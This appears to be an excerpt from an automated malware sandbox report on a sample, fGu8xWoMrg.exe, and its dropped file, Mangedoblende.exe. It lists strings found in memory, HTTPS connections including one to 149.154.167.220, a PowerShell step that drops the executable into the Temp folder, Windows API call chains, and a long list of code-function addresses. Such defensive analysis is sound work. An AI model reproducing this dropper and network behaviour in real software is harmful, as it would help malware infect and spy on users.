            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F592000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F58D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBeq
            Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.5:49905 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 216.58.212.161:443 -> 192.168.2.5:49916 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49997 version: TLS 1.2
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BD0E96_2_225BD0E9
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BCC8F6_2_225BCC8F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BCCA06_2_225BCCA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BD5506_2_225BD550
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225B95486_2_225B9548
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BD5406_2_225BD540
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225B29626_2_225B2962
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BDDF16_2_225BDDF1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BD9996_2_225BD999
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_225BD9A86_2_225BD9A8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A7B786_2_227A7B78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A77206_2_227A7720
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A81D06_2_227A81D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A8FB06_2_227A8FB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AB7A86_2_227AB7A8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A4A786_2_227A4A78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ACE786_2_227ACE78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A64786_2_227A6478
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A6E726_2_227A6E72
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A6E706_2_227A6E70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AEE686_2_227AEE68
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A34606_2_227A3460
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ACE676_2_227ACE67
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AEE5F6_2_227AEE5F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A1A506_2_227A1A50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A34506_2_227A3450
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A1A4C6_2_227A1A4C
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A00406_2_227A0040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ABC386_2_227ABC38
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A60306_2_227A6030
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ADC286_2_227ADC28
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ABC2F6_2_227ABC2F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A60226_2_227A6022
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A46226_2_227A4622
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A46206_2_227A4620
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A6A186_2_227A6A18
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AFC186_2_227AFC18
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227ADC196_2_227ADC19
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A30086_2_227A3008
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A00076_2_227A0007
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A6A076_2_227A6A07
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AF2F86_2_227AF2F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A08F06_2_227A08F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A22F06_2_227A22F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AD2F76_2_227AD2F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AF2E76_2_227AF2E7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A4ED06_2_227A4ED0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A72CA6_2_227A72CA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC0C86_2_227AC0C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A72C86_2_227A72C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A4EC06_2_227A4EC0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A38B86_2_227A38B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE0B86_2_227AE0B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC0B76_2_227AC0B7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A1EA86_2_227A1EA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE0AF6_2_227AE0AF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A04986_2_227A0498
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A1E986_2_227A1E98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A64886_2_227A6488
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AF7786_2_227AF778
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A57706_2_227A5770
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A7B696_2_227A7B69
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC5586_2_227AC558
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A27586_2_227A2758
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A0D486_2_227A0D48
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE5486_2_227AE548
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC5486_2_227AC548
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A27496_2_227A2749
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AA9386_2_227AA938
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE5386_2_227AE538
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A53286_2_227A5328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AA9286_2_227AA928
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A77226_2_227A7722
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AB3186_2_227AB318
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AD3086_2_227AD308
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A23006_2_227A2300
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AB3076_2_227AB307
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A15F86_2_227A15F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A2FF96_2_227A2FF9
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC9E86_2_227AC9E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A15E86_2_227A15E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE9D86_2_227AE9D8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A5BD86_2_227A5BD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AC9D86_2_227AC9D8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AE9CF6_2_227AE9CF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A2BB06_2_227A2BB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A11A06_2_227A11A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A2BA06_2_227A2BA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A8FA16_2_227A8FA1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AD7986_2_227AD798
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AB7986_2_227AB798
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AF7886_2_227AF788
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227A57806_2_227A5780
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_227AD7876_2_227AD787
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22815FD86_2_22815FD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281CAE06_2_2281CAE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228166786_2_22816678
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228112806_2_22811280
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228191806_2_22819180
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22814D896_2_22814D89
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228124886_2_22812488
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281BC886_2_2281BC88
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228179886_2_22817988
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281A48F6_2_2281A48F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22811B916_2_22811B91
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281E7906_2_2281E790
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22814D986_2_22814D98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228179986_2_22817998
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22812D9C6_2_22812D9C
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22811BA06_2_22811BA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281A4A06_2_2281A4A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281FAA06_2_2281FAA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281CFA66_2_2281CFA6
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22818CA96_2_22818CA9
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22812DA86_2_22812DA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281CFA86_2_2281CFA8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228156A86_2_228156A8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281B7AF6_2_2281B7AF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281FAB06_2_2281FAB0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228156B86_2_228156B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22818CB86_2_22818CB8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281E2B86_2_2281E2B8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228136BF6_2_228136BF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228174BF6_2_228174BF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281B7C06_2_2281B7C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228104C06_2_228104C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22815FC76_2_22815FC7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228136C86_2_228136C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281E2C86_2_2281E2C8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22819FC86_2_22819FC8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281CAD16_2_2281CAD1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228104D06_2_228104D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228174D06_2_228174D0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281F5D76_2_2281F5D7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22819FD86_2_22819FD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22813FD86_2_22813FD8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22810DE06_2_22810DE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228187E06_2_228187E0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22813FE86_2_22813FE8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281F5E86_2_2281F5E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22811FE86_2_22811FE8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281B2E86_2_2281B2E8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22810DF06_2_22810DF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228187F06_2_228187F0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281DDF36_2_2281DDF3
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228148F76_2_228148F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22811FF86_2_22811FF8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281B2F86_2_2281B2F8
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22816FFB6_2_22816FFB
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228116FF6_2_228116FF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22819AFF6_2_22819AFF
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281DE006_2_2281DE00
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228100076_2_22810007
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228129076_2_22812907
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228149086_2_22814908
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228170086_2_22817008
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281C6086_2_2281C608
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281660F6_2_2281660F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281F1116_2_2281F111
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228117106_2_22811710
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22819B106_2_22819B10
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228152196_2_22815219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228183196_2_22818319
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228129186_2_22812918
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281C6186_2_2281C618
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281AE1F6_2_2281AE1F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281F1206_2_2281F120
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281D9276_2_2281D927
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228152286_2_22815228
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228183286_2_22818328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281322F6_2_2281322F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281AE306_2_2281AE30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22816B306_2_22816B30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228196376_2_22819637
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22815B396_2_22815B39
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228132386_2_22813238
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281D9386_2_2281D938
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228100406_2_22810040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22816B406_2_22816B40
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281C1436_2_2281C143
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22815B486_2_22815B48
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228196486_2_22819648
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281EC4B6_2_2281EC4B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22813B4F6_2_22813B4F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281C1506_2_2281C150
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228109506_2_22810950
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22817E506_2_22817E50
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22813B586_2_22813B58
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281EC586_2_2281EC58
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281A9586_2_2281A958
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228109606_2_22810960
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22817E606_2_22817E60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281D4606_2_2281D460
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281A9686_2_2281A968
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228144686_2_22814468
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228165686_2_22816568
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228191716_2_22819171
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281D4706_2_2281D470
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228112706_2_22811270
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228144786_2_22814478
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228124786_2_22812478
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281BC786_2_2281BC78
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2281E77F6_2_2281E77F
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228370C06_2_228370C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2283D7106_2_2283D710
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228338806_2_22833880
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228306806_2_22830680
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22836A806_2_22836A80
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228354A06_2_228354A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228322A06_2_228322A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22833EC06_2_22833EC0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22830CC06_2_22830CC0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22835AE06_2_22835AE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228328E06_2_228328E0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22835E006_2_22835E00
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22832C006_2_22832C00
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228300076_2_22830007
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228348206_2_22834820
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228316206_2_22831620
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228332406_2_22833240
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228300406_2_22830040
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228364406_2_22836440
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2283EE486_2_2283EE48
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22834E606_2_22834E60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22831C606_2_22831C60
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22836A706_2_22836A70
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228351806_2_22835180
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22831F806_2_22831F80
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22836DA06_2_22836DA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22833BA06_2_22833BA0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228309A06_2_228309A0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228357C06_2_228357C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228325C06_2_228325C0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228341E06_2_228341E0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22830FE06_2_22830FE0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228345006_2_22834500
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228313006_2_22831300
